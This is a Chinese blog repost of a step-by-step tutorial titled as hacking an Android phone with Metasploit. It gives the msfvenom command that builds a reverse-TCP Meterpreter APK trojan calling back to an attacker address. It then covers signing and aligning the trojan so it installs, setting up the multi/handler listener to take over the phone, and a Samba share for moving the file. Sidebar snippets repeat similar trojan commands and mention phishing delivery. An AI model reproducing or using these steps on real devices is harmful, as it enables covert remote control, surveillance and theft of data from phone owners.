使用Metasploit入侵安卓手机(超详细哦)

最新推荐文章于 2024-04-24 15:42:15 发布
最新推荐文章于 2024-04-24 15:42:15 发布
阅读量1.8w 收藏 221
点赞数 30
文章标签: 移动开发 操作系统
原文链接:https://my.oschina.net/ichunqiu/blog/869690
版权

本文原创作者:newbie,本文属i春秋原创奖励计划,未经许可禁止转载!

1.环境准备:
Kali2.0(msfVENOM、metasploit)
安卓手机

 

2.利用过程:

使用msfvenom生成apk木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=1234 R > /test/newbie.apk

 

P 攻击payload

LHOST = 接收反弹连接主机

LPORT = 接收反弹连接主机的监听端口

然后是路径生成路径

155535dldocllqs000cbwl.png

为木马添加数字签名

使用到的工具:

1.keytools (密钥、证书管理工具)

2.Jarsigner(jar签名、校验工具)

3.Zipalign(APK优化攻击)需安装

首先使用keytools生成创建证书:

 

keytool -genkey -v -keystore apk-trojan-key.keystore -alias newbie -keyalg RSA -keysize 1024 -validity 999

 

-v 显示密钥库中的证书详细信息

-k eystore 指定密钥库的名称

-alias 产生别名

-keyalg 指定密钥的算法(默认为DSA)

-keysize 指定密钥长度

-validity 指定创建的证书有效期多少天(默认90)

155609bvketckto40ecv4t.png

 

然后使用jarsigner进行签名:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore newbie.apk newbie

 

-verbose 签名/验证时输出详细信息

-sigalg  签名算法的名称

-digestalg 摘要算法的名称

-keystore 密钥库位置

进行签名文件+别名


155638rhczvu2mjm7dihtn.png 

使用-verify对文件签名验证

jarsigner -verify -verbose newbie.apk

 

155713igzew18to4108brb.png

这样就可以把apk发到手机上安装了

不不不,忘了一步

使用Zipalign优化apk,忘掉这一步部分手机会无法安装,比如我的

zipalign -v 4 newbie.apk  newbie1.apk

155756sa6bbg1bxz6u520o.png

 

ok,启动metasploit

依次执行

use exploit/multi/handler 加载攻击模块

set payload android/meterpreter/reverse_tcp  选择要使用的Payload

 

155832b22xukbizu02j440.png

show options 查看需要设置的参数

155927myalttsa2t0uaeaa.png

设置主机ip及端口:

160010y0j6mur16l5986l9.png

exploit执行

160043i4gyfqhw3ik1344z.png

手机运行安装好的木马,这时msf建立了一个会话连接

160132itiofairfh7a7r1o.png

Help一下看我们能做什么

160209t5sum5qu8qahuhus.png

附一张网上淘来的图:

160238vd54u3xhvhmuxy4d.png

 

3.小彩蛋:

肯定会有人问,我要怎么把kali的apk文件移到我手机上呢?

给大家提供一个简单的方法。共享一个文件夹把文件放到文件夹中

具体操作:

mkdir /test 创建要共享的文件夹

chmod 777 -R /test 修改权限

vi /etc/samba/smb.conf 编辑配置文件在末尾加入下面内容

 

[share]

      path =/a/share

      available = yes

      browsealbe = yes

      public= no

      writable = yes

创建一个用户然后启动就好

/etc/init.d/samba restart

转载于:https://my.oschina.net/ichunqiu/blog/869690

chengman3837
关注
  • 30
    点赞
  • 221
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali 2020:用Metasploit实验入侵自己的安卓手机
askos的博客
11-01 1万+
目标:使用Kali里的Metasploit远程控制自己的安卓手机 (先写个大体的流程,改天做成详细教程。仅限于对自己的手机做实验,请勿用于非法行为) 一:生产apk安卓应用 1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 R > t.apk 2,使用zipzlign对apk进行对齐 zipalign -v 4 t.apk tz
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5547
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
悬浮框代码
11-12
android 悬浮框代码
反编译简单分析metasploit生成的安卓木马
Aiwin的博客
02-06 1091
apk反编译简单分析metasploit安卓木马
黑客入侵手机的几种途径
2201_75362610的博客
03-02 997
当网络犯罪分子认为新的攻击媒介在经济上可行时,他们会瞄准新的攻击媒介,尤其是在没有强有力的安全措施的情况下。攻击面向未经授权的移动应用程序后端服务转移。网络犯罪分子通过扫描目标应用程序功能列表来获取访问权限,同时收集API密钥或业务逻辑来设计程序化攻击。因此,移动端应用安全频频出现问题,那么常见的针对移动端的五种入侵途径有哪些呢?
简单记录自己利用meterpreter入侵安卓
weixin_44731948的博客
01-16 1129
简单记录自己利用meterpreter入侵安卓机 需要准备 一台安卓机 安装kali Linux系统 入侵流程 kali终端执行 msfvenom -p android/meterpreter/reverse_tcp lhost=(kali linux的IP地址) lport=5555 R>/root/a.apk可以看到在root目录下生成了a.apk文件 将apk文件发送到安卓手机(方式自行选择,此处可扩展) 手机安装apk,为了测试成功,还需根据测试目的授予相应权限 kali
Lua逻辑运算符and,or,not
热门推荐
班门弄斧
04-15 1万+
在Lua中合理使用and,or,not可提高代码效率,减少代码量,增加可读性。 Lua逻辑运算符and,or,not规则如下: 设定 A 的值为 true,B 的值为 false: 操作符 描述 实例 and 逻辑与操作符。 若 A 为 true,则返回 B;若A为false,则返回A。 (A and B) 为 false。 or 逻辑或...
安卓手机渗透测试
11-04
移动安全是当下最热门的话题之一。安卓系统最为市场上占有量最高的移动操作系统,拥有极其广泛的用户基础,大量的个人数据和商业数据都存储在安卓移动设备上。本专栏将从最基础的实验环境搭建,软件安装使用开始讲。没有复杂的原理讲解,更多的实践操作,小白也能跟着从零开始学起。注意:本教程内容仅用于网络安全学习研究,未经授权的入侵需要自己承担相应的责任,与作者无关。
Meterpreter在各种操作系统中的应用
PortugalCR7的博客
06-29 135
接下来我们把pentset.apk文件安装到手机中,可以看到手机报毒,我们授权其安装。我们现在以android/meterpreter/reverse_tcp为例。首先查找metesploit中可以在安卓运行的meterpreter。由于是旧版本的apk文件,手机打不开此文件。查看安卓手机ip和路由器ip。启动Metasploit。现在我们启动一个主控端。
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 3608
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
kali安卓手机木马远控
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
Andlua解密(通用)
10-30
andlua 低版本base64解密及最新的加密解密,游戏lua脚本低版本和高版本的解密,andlua的电脑版解密工具及手机解密工具
AndLua-开源
04-25
用于Lua的Android纯Java解释器。
使用Metasploit入侵windows之自动扫描
08-07
Metasploit入侵windows之自动扫描方法
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
metasploit 入侵测试手册
06-19
metasploit penetration testing cookbook
metasploit开发使用详细解析
04-11
metasploit开发使用详细解析
MetaSploit终端下PostgreSQL数据库的使用.rar
12-29
MetaSploit终端下PostgreSQL数据库的使用.rar
BottomSheetDialogFragment大量踩坑-自适应高度和最大高度和滚动问题等等
最新发布
jzlhll123的专栏
04-24 219
BottomSheetDialogFragment有大量的坑,这里做了不少的记录。固定展开,含有EditText的处理,自定义Toast的显示父控件,无法在dismiss之前得到监听,自适应高度和限定最大高度,含有滚动内容的处理。
metasploit 安卓
07-27
回答: Metasploit是一款开源的渗透测试框架,可以用于测试和评估计算机系统的安全性。它提供了各种模块和工具,包括用于攻击和渗透测试的payload。在引用的内容中,提到了使用Metasploit来创建一个针对安卓系统的恶意软件。首先,通过msfvenom命令生成一个包含恶意payload的apk文件。然后,使用msfconsole启动Metasploit,并设置payload监听。最后,使用keytool生成一个密钥库文件,用于签名apk文件。这样,当受害者安装并打开这个apk文件时,攻击者就可以获得对受害者设备的控制权。请注意,这种行为是非法的,且违反了用户的隐私权。强烈建议不要从事任何非法活动,包括未经授权的渗透测试。 #### 引用[.reference_title] - *1* *2* [Kali 2021:用Metasploit实验入侵自己的安卓手机](https://blog.csdn.net/weixin_52221158/article/details/125878898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [使用Metasploit入侵安卓手机(详细哦)](https://blog.csdn.net/chengman3837/article/details/100782583)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值